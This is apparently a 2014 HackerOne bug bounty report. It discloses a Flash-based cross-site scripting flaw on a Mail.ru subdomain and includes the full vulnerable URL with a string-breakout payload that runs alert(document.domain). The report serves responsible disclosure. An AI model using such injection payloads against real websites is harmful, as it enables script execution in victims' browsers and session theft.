Mail.ru: Flash XSS - http://hi-tech.mail.ru/

2014-06-02T21:29:18
ID H1:14485
Type hackerone
Reporter quistertow
Modified 2014-07-05T11:40:27

Description

Hello, I found a Flash based XSS in http://hi-tech.mail.ru/ Vulnerable link : http://hi-tech.mail.ru/img/flash/audio-player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

Tested on Mozilla Firefox and Google Chrome. Regards, Florin